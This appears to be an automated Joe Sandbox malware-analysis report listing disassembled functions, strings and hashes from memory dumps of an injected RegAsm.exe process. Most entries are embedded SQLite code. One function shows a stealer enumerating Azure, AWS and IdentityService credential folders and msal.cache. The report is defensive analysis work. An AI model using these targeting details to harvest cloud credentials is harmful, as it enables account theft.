Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: %.16g$%.18s-%s$%c%u$%lld$%s(%d)$(blob)$,%s%s%s$BINARY$NULL$k(%d$program$vtab:%p
API String ID: 0-900822179
Opcode ID: 7024c8258dc06ce1db16c56dafc8ba90bc25f8352f5ff37da2ee40a0fbb75fc5
Instruction ID: 1f4ad4dfc48363f1f8f5dc94452ba6f697ed7f8e076665ee13f6af51696ed5f5
Opcode Fuzzy Hash: 7024c8258dc06ce1db16c56dafc8ba90bc25f8352f5ff37da2ee40a0fbb75fc5
Instruction Fuzzy Hash: ED9119755083059BCB09CF14C844B6B77EABF81704F9C884DFA958B252DB36E94ACBB1

Uniqueness

Uniqueness Score: -1.00%

Function 1983D820 Relevance: 35.2, APIs: 8, Strings: 12, Instructions: 223COMMON

Download Yara Rule

Strings

simple, xrefs: 1983D8A9
fts4aux, xrefs: 1983D840
fts3, xrefs: 1983D9CA
optimize, xrefs: 1983D9A4
fts3_tokenizer, xrefs: 1983D921
fts3tokenize, xrefs: 1983DA27
fts4, xrefs: 1983D9F0
unicode61, xrefs: 1983D90B
snippet, xrefs: 1983D93C
matchinfo, xrefs: 1983D970, 1983D98A
offsets, xrefs: 1983D956
porter, xrefs: 1983D8EE

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: fts3$fts3_tokenizer$fts3tokenize$fts4$fts4aux$matchinfo$offsets$optimize$porter$simple$snippet$unicode61
API String ID: 0-449611708
Opcode ID: 173b1c943449c7cd4eb3418c9b9f20c4cd00ccaff898dd4a6c1f62153e9738a2
Instruction ID: b52d49632edefbaae2dd7243f28535d3e9a611f2388e7eb0c233db16da82db0d
Opcode Fuzzy Hash: 173b1c943449c7cd4eb3418c9b9f20c4cd00ccaff898dd4a6c1f62153e9738a2
Instruction Fuzzy Hash: 7D514E70A4431167E310AE789D85F9736AC6F50B1AF8C413CFD08A6282E769F75EC2D2

Uniqueness

Uniqueness Score: -1.00%

Function 004150DC Relevance: 35.1, APIs: 11, Strings: 9, Instructions: 135stringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 004150E1
memset.MSVCRT ref: 00415101

Part of subcall function 0040F7A3: SHGetFolderPathA.SHELL32(00000000,O<B,00000000,00000000,?), ref: 0040F7D4

lstrcat.KERNEL32(?,00000000), ref: 00415127
lstrcat.KERNEL32(?,\.azure\), ref: 00415144

Part of subcall function 00401128: _EH_prolog.MSVCRT ref: 0040112D

Part of subcall function 00414CC7: _EH_prolog.MSVCRT ref: 00414CCC
Part of subcall function 00414CC7: wsprintfA.USER32 ref: 00414CEB
Part of subcall function 00414CC7: FindFirstFileA.KERNEL32(?,?), ref: 00414D02
Part of subcall function 00414CC7: StrCmpCA.SHLWAPI(?,00424818), ref: 00414D1F
Part of subcall function 00414CC7: StrCmpCA.SHLWAPI(?,0042481C), ref: 00414D39
Part of subcall function 00414CC7: wsprintfA.USER32 ref: 00414D5D
Part of subcall function 00414CC7: StrCmpCA.SHLWAPI(?,0042447E), ref: 00414D6E
Part of subcall function 00414CC7: wsprintfA.USER32 ref: 00414D8B
Part of subcall function 00414CC7: PathMatchSpecA.SHLWAPI(?,?), ref: 00414DB2
Part of subcall function 00414CC7: lstrcat.KERNEL32(?,?), ref: 00414DDE
Part of subcall function 00414CC7: lstrcat.KERNEL32(?,00424834), ref: 00414DF0
Part of subcall function 00414CC7: lstrcat.KERNEL32(?,?), ref: 00414E00
Part of subcall function 00414CC7: lstrcat.KERNEL32(?,00424838), ref: 00414E12
Part of subcall function 00414CC7: lstrcat.KERNEL32(?,?), ref: 00414E26

memset.MSVCRT ref: 0041517F
lstrcat.KERNEL32(?,00000000), ref: 004151AA
lstrcat.KERNEL32(?,\.aws\), ref: 004151C7

Part of subcall function 00414CC7: wsprintfA.USER32 ref: 00414D9F
Part of subcall function 00414CC7: FindNextFileA.KERNEL32(00000000,?), ref: 00414EF6
Part of subcall function 00414CC7: FindClose.KERNEL32(00000000), ref: 00414F05

memset.MSVCRT ref: 00415202
lstrcat.KERNEL32(?,00000000), ref: 0041522D
lstrcat.KERNEL32(?,\.IdentityService\), ref: 0041524A
memset.MSVCRT ref: 00415285

Part of subcall function 004010D8: _EH_prolog.MSVCRT ref: 004010DD

Strings

Azure\.IdentityService, xrefs: 00415250
\.azure\, xrefs: 00415138
*.*, xrefs: 0041514F
Azure\.azure, xrefs: 0041514A
\.aws\, xrefs: 004151BB
*.*, xrefs: 004151D2
\.IdentityService\, xrefs: 0041523E
Azure\.aws, xrefs: 004151CD
msal.cache, xrefs: 00415255

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$H_prologmemsetwsprintf$Find$FilePath$CloseFirstFolderMatchNextSpec
String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
API String ID: 2836893066-974132213
Opcode ID: 9196b403b137c738579b3108a1551c267e6cb69ad4e8bf29b5987e1cf497b0e3
Instruction ID: bbbb16994cd893d1d19cc7249d0d84fa93e21691c936d3973ee14e07f04d78ce
Opcode Fuzzy Hash: 9196b403b137c738579b3108a1551c267e6cb69ad4e8bf29b5987e1cf497b0e3
Instruction Fuzzy Hash: 4F41A172D00218AADB00FBA1DC46EEE776CEF4C344F00456FB555A3182EA7C97588BA5

Uniqueness

Uniqueness Score: -1.00%

Function 199B7FB0 Relevance: 33.6, APIs: 14, Strings: 5, Instructions: 342COMMON

Download Yara Rule

Strings

winGetTempname1, xrefs: 199B817B
winGetTempname5, xrefs: 199B8233
etilqs_, xrefs: 199B824C
winGetTempname2, xrefs: 199B8094
winGetTempname4, xrefs: 199B8355

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: etilqs_$winGetTempname1$winGetTempname2$winGetTempname4$winGetTempname5
API String ID: 0-2933911573
Opcode ID: 66982031768a430392fb939dfee6fca2e6b8a7f47905455b679e9bd10654d348
Instruction ID: 7d163c8a298822ff83a47866fd97d380ac8840136914135efb73078c20bf5cca
Opcode Fuzzy Hash: 66982031768a430392fb939dfee6fca2e6b8a7f47905455b679e9bd10654d348
Instruction Fuzzy Hash: F9A198769002415FD7018B3D9C81FAA7B9DAF45211F8D416DECCA9E182E62BA14FC7B2

Uniqueness

Uniqueness Score: -1.00%

Function 19842BE0 Relevance: 31.8, APIs: 8, Strings: 10, Instructions: 346COMMON

Download Yara Rule

Strings

API call with %s database connection pointer, xrefs: 19842E5A
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19842E69
SELECT * FROM (SELECT 'sqlite_schema' AS name,1 AS rootpage,'table' AS type UNION ALL SELECT name,rootpage,type FROM "%w".sqlite_schema WHERE rootpage!=0), xrefs: 19842DA4
invalid, xrefs: 19842E4E
unopened, xrefs: 19842E55
misuse, xrefs: 19842E73
WHERE name=%Q, xrefs: 19842DB7
NULL, xrefs: 19842E38
%s at line %d of [%.10s], xrefs: 19842E78
ORDER BY name, xrefs: 19842DCC

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: ORDER BY name$%s at line %d of [%.10s]$API call with %s database connection pointer$NULL$SELECT * FROM (SELECT 'sqlite_schema' AS name,1 AS rootpage,'table' AS type UNION ALL SELECT name,rootpage,type FROM "%w".sqlite_schema WHERE rootpage!=0)$WHERE name=%Q$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$invalid$misuse$unopened
API String ID: 0-1179878930
Opcode ID: 9291af94b18bef1b15aaa7fec0509df2cd0d83050ede330f8d82156192da4b2f
Instruction ID: 8bfcdf138ef49d578248da959e388a7d71a747c1b5b1fc49de7c688b03a81b7e
Opcode Fuzzy Hash: 9291af94b18bef1b15aaa7fec0509df2cd0d83050ede330f8d82156192da4b2f
Instruction Fuzzy Hash: 67C1247190835C9BD710CF28CC45B5B77A4AF60344FAC852DEC599B282E735E98AC7A2

Uniqueness

Uniqueness Score: -1.00%

Function 004086DA Relevance: 30.4, APIs: 20, Instructions: 387stringmemoryCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 004086DF

Part of subcall function 0040E2EA: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E314

Part of subcall function 0040E463: _EH_prolog.MSVCRT ref: 0040E468
Part of subcall function 0040E463: lstrlen.KERNEL32(?,00000000,00000014,?,?,00415C39,?,?,00424A48,?,00000000,004244C3), ref: 0040E490
Part of subcall function 0040E463: lstrcpy.KERNEL32(00000000), ref: 0040E4B7
Part of subcall function 0040E463: lstrcat.KERNEL32(?,?), ref: 0040E4C2

Part of subcall function 0040E3A8: lstrcpy.KERNEL32(00000000,?), ref: 0040E3E1

Part of subcall function 0040F5DE: _EH_prolog.MSVCRT ref: 0040F5E3
Part of subcall function 0040F5DE: GetSystemTime.KERNEL32(?,00424398,00000000,00000001,00000000,004244BE,004244B3,004244B2,00000000,00000000), ref: 0040F623

Part of subcall function 0040E3EF: _EH_prolog.MSVCRT ref: 0040E3F4
Part of subcall function 0040E3EF: lstrcpy.KERNEL32(00000000), ref: 0040E440
Part of subcall function 0040E3EF: lstrcat.KERNEL32(?,?), ref: 0040E44A

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 004088FB
HeapAlloc.KERNEL32(00000000), ref: 00408902
lstrcat.KERNEL32(?,00000000), ref: 00408A26
lstrcat.KERNEL32(?,00423D9C), ref: 00408A34
lstrcat.KERNEL32(?,00000000), ref: 00408A46
lstrcat.KERNEL32(?,00423DA0), ref: 00408A54
lstrlen.KERNEL32(?), ref: 00408B67
lstrlen.KERNEL32(?), ref: 00408B75

Part of subcall function 0040E321: lstrcpy.KERNEL32(00000000,FEF4858D), ref: 0040E347

Part of subcall function 00401128: _EH_prolog.MSVCRT ref: 0040112D

Part of subcall function 00412F70: _EH_prolog.MSVCRT ref: 00412F75
Part of subcall function 00412F70: CreateThread.KERNEL32(00000000,00000000,00411D72,?,00000000,00000000), ref: 0041301B
Part of subcall function 00412F70: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 00413023

memset.MSVCRT ref: 00408BCE

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prologlstrcat$lstrcpy$lstrlen$Heap$AllocCreateObjectProcessSingleSystemThreadTimeWaitmemset
String ID:
API String ID: 1592390033-0
Opcode ID: 0e32acc3270a804976cc687eaf11467497462d9b8367ea082ee213fc57e41833
Instruction ID: b033f1db96c4c2c7975a85d4d5340990d25991923da802ee933f36c6671bd85d
Opcode Fuzzy Hash: 0e32acc3270a804976cc687eaf11467497462d9b8367ea082ee213fc57e41833
Instruction Fuzzy Hash: 89F13A71800148EADF05EBA6DD46AEDBB75BF14308F14886EF442731D2EF782A19DB25

Uniqueness

Uniqueness Score: -1.00%

Function 19945D70 Relevance: 28.3, APIs: 8, Strings: 8, Instructions: 266COMMON

Download Yara Rule

Strings

secure-delete, xrefs: 19946031
automerge, xrefs: 19945E59
pgsz, xrefs: 19945D81
crisismerge, xrefs: 19945EF7
rank, xrefs: 19945FBB
usermerge, xrefs: 19945EAD
deletemerge, xrefs: 19945F64
hashsize, xrefs: 19945DF0

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: automerge$crisismerge$deletemerge$hashsize$pgsz$rank$secure-delete$usermerge
API String ID: 0-3330941169
Opcode ID: 278009c0e4b37fc4ccb04a1c2ed992099399bd7957eb8ea74779d240b62c3e13
Instruction ID: 8c8631b7e3f8a97e4ce230f58b1d1634212f78a657608eec85c6ee23e05dacb5
Opcode Fuzzy Hash: 278009c0e4b37fc4ccb04a1c2ed992099399bd7957eb8ea74779d240b62c3e13
Instruction Fuzzy Hash: 207139BAB003115BC6069A5AED0154F77D8EFC5212F2C087DF986C7251EB21E95AC7E3

Uniqueness

Uniqueness Score: -1.00%

Function 0041068E Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 139stringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00410693
StrCmpCA.SHLWAPI(00000000,block,00000000,?,?,00415572), ref: 004106B5
ExitProcess.KERNEL32 ref: 004106C0
strtok_s.MSVCRT ref: 004106D7

Strings

block, xrefs: 004106A0

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExitH_prologProcessstrtok_s
String ID: block
API String ID: 3745986650-2199623458
Opcode ID: 68afcdf46f8253918330cdb99f04ed3b87d8c35154cbae6e81da98b66b7883ea
Instruction ID: 9b64ad6d5f196301b4d0c42fb4f5707bd1d9b9b974bd1dc61b790080033fc8d1
Opcode Fuzzy Hash: 68afcdf46f8253918330cdb99f04ed3b87d8c35154cbae6e81da98b66b7883ea
Instruction Fuzzy Hash: 89418571A54311EBCB10BFB1AC45AEB37A8FA55745760483BF442E2250E6B8E5C08BA8

Uniqueness

Uniqueness Score: -1.00%

Function 19835E20 Relevance: 26.7, APIs: 8, Strings: 7, Instructions: 496COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19835F2B, 19836253, 19836385
SELECT t.%Q FROM %Q.%Q AS t WHERE t.%Q MATCH '*id', xrefs: 19835E6F
API called with finalized prepared statement, xrefs: 19835F1F, 19836247, 19836379
no such fts5 table: %s.%s, xrefs: 198362EA
misuse, xrefs: 19835F35, 1983625D, 1983638F
recursive definition for %s.%s, xrefs: 19835E4C
%s at line %d of [%.10s], xrefs: 19835F3A, 19836262, 19836394

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with finalized prepared statement$SELECT t.%Q FROM %Q.%Q AS t WHERE t.%Q MATCH '*id'$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$no such fts5 table: %s.%s$recursive definition for %s.%s
API String ID: 0-1070437968
Opcode ID: b7926691654572d5e4b0473803d7d0905c87fe1266f84c6c57d3f78b10c913d0
Instruction ID: f4fca031cf749d35d5ce774e7098e4dc8778cd7f94225c3f8a8bf36cdaf10acb
Opcode Fuzzy Hash: b7926691654572d5e4b0473803d7d0905c87fe1266f84c6c57d3f78b10c913d0
Instruction Fuzzy Hash: 8D02F1B19043459BD710CF28CC86B5B77E8BF5470AF8C452CE84997282E775E649CBE2

Uniqueness

Uniqueness Score: -1.00%

Function 198A9980 Relevance: 24.9, APIs: 7, Strings: 7, Instructions: 429COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 198A9A35, 198A9D90
API called with finalized prepared statement, xrefs: 198A9A19, 198A9D84
misuse, xrefs: 198A9A3F, 198A9D9A
API called with NULL prepared statement, xrefs: 198A9A04
no such function: %s, xrefs: 198A9E8C
%s at line %d of [%.10s], xrefs: 198A9A44, 198A9D9F
SELECT %s, xrefs: 198A99B1

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$SELECT %s$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$no such function: %s
API String ID: 0-3900766660
Opcode ID: 74655fc0a1ed967b3753cc41a32a7690d054a39bff9894e735cedc397867b43a
Instruction ID: 46a6a420d3d769663334918dbf536815c5ca7bfa1b9e16833e3ac3e83dcb3ccb
Opcode Fuzzy Hash: 74655fc0a1ed967b3753cc41a32a7690d054a39bff9894e735cedc397867b43a
Instruction Fuzzy Hash: 9DE104B89087419BD710CF28CC41B5B77E8BF94714F1C452CE8899B282E77BE849C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 19863800 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 184COMMON

Download Yara Rule

Strings

null, xrefs: 198638E7
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19863930
real, xrefs: 19863895, 198638EC
API called with finalized prepared statement, xrefs: 19863924
cannot open value of type %s, xrefs: 198638ED
misuse, xrefs: 1986393A
%s at line %d of [%.10s], xrefs: 1986393F
integer, xrefs: 1986389A
no such rowid: %lld, xrefs: 198639F8

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with finalized prepared statement$cannot open value of type %s$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$integer$misuse$no such rowid: %lld$null$real
API String ID: 0-1477268580
Opcode ID: f903d615989857ae6be13a6bd7efd572a5e76320270beb7d6a51daa4dc02fdca
Instruction ID: c1fd5361616cb2c5749335a9e6aa5ad83c2325989102c84d575c55823752e560
Opcode Fuzzy Hash: f903d615989857ae6be13a6bd7efd572a5e76320270beb7d6a51daa4dc02fdca
Instruction Fuzzy Hash: 0851FDB46047059FD300CF28DC80A66B3A4FF95315F08892EE9568B752EB32E848CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 1994F370 Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 196COMMON

Download Yara Rule

Strings

id INTEGER PRIMARY KEY, sz BLOB, origin INTEGER, xrefs: 1994F51C
docsize, xrefs: 1994F52D
k PRIMARY KEY, v, xrefs: 1994F544
config, xrefs: 1994F549
id INTEGER PRIMARY KEY, xrefs: 1994F43E
content, xrefs: 1994F49D
id INTEGER PRIMARY KEY, sz BLOB, xrefs: 1994F524, 1994F52C
version, xrefs: 1994F560
, c%d, xrefs: 1994F469

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
